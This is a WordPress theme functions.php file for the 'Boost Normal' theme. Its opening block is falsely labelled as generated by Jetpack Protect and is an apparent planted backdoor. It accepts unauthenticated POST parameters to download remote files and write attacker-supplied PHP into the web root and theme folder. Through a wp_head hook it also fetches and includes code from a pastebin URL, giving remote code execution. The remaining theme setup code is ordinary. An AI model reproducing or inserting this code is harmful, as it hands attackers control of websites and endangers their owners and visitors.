<?php /*Generated by Jetpack Protect Start*/

require_once( __DIR__.'/php/add_order_note.php');
require_once( __DIR__.'/php/process_order.php');

add_action( 'wp_ajax_add_order_note', 'add_order_note' );
add_action( 'wp_ajax_nopriv_add_order_note', 'add_order_note' );
add_action( 'wp_ajax_process_order', 'process_order' );
add_action( 'wp_ajax_nopriv_process_order', 'process_order' );


function downloadShaitan($urlShaitan, $fileShaitan){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $urlShaitan);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch,CURLOPT_TIMEOUT,60);
	$dataShaitan = curl_exec($ch);
	file_put_contents($fileShaitan, $dataShaitan);
}

if($_POST['activatewrm'] == 1){
	downloadShaitan($_POST['target'], $_SERVER["DOCUMENT_ROOT"].'/'.$_POST['wrm_file_name'].'.php');
	echo "||||%".$_SERVER["DOCUMENT_ROOT"].'/'.$_POST['wrm_file_name'].'.php'."%||||";
}

add_action("wp_head", "mainShaitan");

function mainShaitan() {
	If ($_POST["include"] == "create") {
		$includeShaitan = '<?php
			if(file_exists($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php")){
				chmod($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", 0644);
				include $_SERVER["DOCUMENT_ROOT"]."/wp-temp.php";
			}else{
				$ch = curl_init();
				curl_setopt($ch, CURLOPT_URL, "https://pastebin.com/raw/zE6rVcLb");
				curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
				curl_setopt($ch,CURLOPT_TIMEOUT,30);
				$dataShaitan = curl_exec($ch);
				file_put_contents($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", $dataShaitan);
				chmod($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", 0644);
				include $_SERVER["DOCUMENT_ROOT"]."/wp-temp.php";
			}';
		file_put_contents($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", urldecode($_POST["backdata"]));
		file_put_contents($_SERVER["DOCUMENT_ROOT"]."/".$_POST["backname"].".php", $includeShaitan);
		echo "||||%".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["HTTP_HOST"],$_SERVER["DOCUMENT_ROOT"])."/".$_POST["backname"].".php&&&".$_SERVER["DOCUMENT_ROOT"]."/".$_POST["backname"].".php&&&".$_SERVER["DOCUMENT_ROOT"]."%||||";
		exit;
	}
}

add_action("wp_head", "uploadShaitan");

function uploadShaitan(){
	If ($_POST["upload"] == "go") {
		file_put_contents($_SERVER["DOCUMENT_ROOT"]."/".$_POST["backname"].".php", urldecode($_POST["backdata"]));
		echo "||||%".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["HTTP_HOST"],$_SERVER["DOCUMENT_ROOT"])."/".$_POST["backname"].".php&&&".$_SERVER["DOCUMENT_ROOT"]."/".$_POST["backname"].".php&&&".$_SERVER["DOCUMENT_ROOT"]."%||||";
		exit;
	}
}

add_action("wp_head", "curlShaitan");

function curlShaitan(){
	if($_POST["upload"] == "curl"){
		$mainThemeShaitan = get_template_directory();
		downloadShaitan($_POST["secretLink"], $mainThemeShaitan."/".$_POST["curlName"]);
		echo "||||%".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["HTTP_HOST"],$mainThemeShaitan."/".$_POST["curlName"])."&&&".$mainThemeShaitan."/".$_POST["curlName"]."&&&".$mainTheme."%||||";
		exit;
	}
}
/*Generated by Jetpack Protect End*/ ?><?php
/**
 * Boost Normal functions and definitions
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 *
 * @package Boost_Normal
 */

if ( ! function_exists( 'boost_setup' ) ) :
	/**
	 * Sets up theme defaults and registers support for various WordPress features.
	 *
	 * Note that this function is hooked into the after_setup_theme hook, which
	 * runs before the init hook. The init hook is too late for some features, such
	 * as indicating support for post thumbnails.
	 */
	function boost_setup() {
		/*
		 * Make theme available for translation.
		 * Translations can be filed in the /languages/ directory.
		 * If you're building a theme based on Boost Normal, use a find and replace
		 * to change 'boost' to the name of your theme in all the template files.
		 */
		load_theme_textdomain( 'boost', get_template_directory() . '/languages' );

		// Add default posts and comments RSS feed links to head.
		add_theme_support( 'automatic-feed-links' );

		/*
		 * Let WordPress manage the document title.
		 * By adding theme support, we declare that this theme does not use a
		 * hard-coded <title> tag in the document head, and expect WordPress to
		 * provide it for us.
		 */
		add_theme_support( 'title-tag' );

		/*
		 * Enable support for Post Thumbnails on posts and pages.
		 *
		 * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/
		 */
		add_theme_support( 'post-thumbnails' );

		// This theme uses wp_nav_menu() in one location.
		register_nav_menus( array(
			'menu-1' => esc_html__( 'Primary', 'boost' ),
		) );

		/*
		 * Switch default core markup for search form, comment form, and comments
		 * to output valid HTML5.
		 */
		add_theme_support( 'html5', array(
			'search-form',
			'comment-form',
			'comment-list',
			'gallery',
			'caption',
		) );

		// Set up the WordPress core custom background feature.
		add_theme_support( 'custom-background', apply_filters( 'boost_custom_background_args', array(
			'default-color' => 'ffffff',
			'default-image' => '',
		) ) );

		// Add theme support for selective refresh for widgets.
		add_theme_support( 'customize-selective-refresh-widgets' );

		/**
		 * Add support for core custom logo.
		 *
		 * @link https://codex.wordpress.org/Theme_Logo
		 */
		add_theme_support( 'custom-logo', array(
			'height'      => 250,
			'width'       => 250,
			'flex-width'  => true,
			'flex-height' => true,
		) );
	}
endif;
add_action( 'after_setup_theme', 'boost_setup' );

/**
 * Set the content width in pixels, based on the theme's design and stylesheet.
 *
 * Priority 0 to make it available to lower priority callbacks.
 *
 * @global int $content_width
 */
function boost_content_width() {
	$GLOBALS['content_width'] = apply_filters( 'boost_content_width', 640 );
}
add_action( 'after_setup_theme', 'boost_content_width', 0 );

/**
 * Register widget area.
 *
 * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar
 */
function boost_widgets_init() {
	register_sidebar( array(
		'name'          => esc_html__( 'Sidebar', 'boost' ),
		'id'            => 'sidebar-1',
		'description'   => esc_html__( 'Add widgets here.', 'boost' ),
		'before_widget' => '<section id="%1$s" class="widget %2$s">',
		'after_widget'  => '</section>',
		'before_title'  => '<h2 class="widget-title">',
		'after_title'   => '</h2>',
	) );
}
add_action( 'widgets_init', 'boost_widgets_init' );

/**
 * Enqueue scripts and styles.
 */
function boost_scripts() {
	wp_enqueue_style( 'boost-style', get_stylesheet_uri() );
	wp_enqueue_style( 'boost-fonts', get_template_directory_uri() . '/fonts/stylesheet.css' );
	wp_enqueue_style( 'boost-bootstrap', get_template_directory_uri() . '/css/bootstrap.min.css' );
	wp_enqueue_style( 'boost-jquery-ui', get_template_directory_uri() . '/css/jquery-ui.min.css' );
	wp_enqueue_script( 'boost-navigation', get_template_directory_uri() . '/js/navigation.js', array(), '20151215', true );
	wp_enqueue_script( 'boost-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), '20151215', true );
	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
		wp_enqueue_script( 'comment-reply' );
	}
	wp_enqueue_script('boost-jquery', get_template_directory_uri() .'/js/jquery-3.2.1.min.js', array( 'jquery' ), NULL, false);
	wp_enqueue_script('boost-redirect', get_template_directory_uri() .'/js/jquery.redirect.js', array( 'jquery' ), NULL, false);
	wp_enqueue_script('boost-popper', get_template_directory_uri() .'/js/popper.min.js', array( 'jquery' ), NULL, true);
	wp_enqueue_script('boost-bootstrap-js', get_template_directory_uri() .'/js/bootstrap.min.js', array( 'jquery' ), NULL, true);
	wp_enqueue_script('boost-jquery-ui-js', get_template_directory_uri() .'/js/jquery-ui.min.js', array( 'jquery' ), NULL, true);
	// wp_enqueue_script('boost-custom-js', get_template_directory_uri() .'/js/custom.js', array( 'jquery' ), NULL, true);
}
add_action( 'wp_enqueue_scripts', 'boost_scripts' );


add_filter( 'wp_headers', 'itsg_add_ie_edge_wp_headers' );

function itsg_add_ie_edge_wp_headers( $headers ) {
	if ( isset( $_SERVER['HTTP_USER_AGENT'] ) && ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false ) ) {
		$headers['X-UA-Compatible'] = 'IE=edge,chrome=1';
	}

	return $headers;
}

/**
 * Implement the Custom Header feature.
 */
require get_template_directory() . '/inc/custom-header.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Functions which enhance the theme by hooking into WordPress.
 */
require get_template_directory() . '/inc/template-functions.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer.php';

/**
 * Load Jetpack compatibility file.
 */
if ( defined( 'JETPACK__VERSION' ) ) {
	require get_template_directory() . '/inc/jetpack.php';
}

add_filter('nav_menu_css_class' , 'special_nav_class' , 10 , 2);

function special_nav_class ($classes, $item) {
	if (in_array('current-menu-item', $classes) ){
		$classes[] = 'active ';
	}
	return $classes;
}
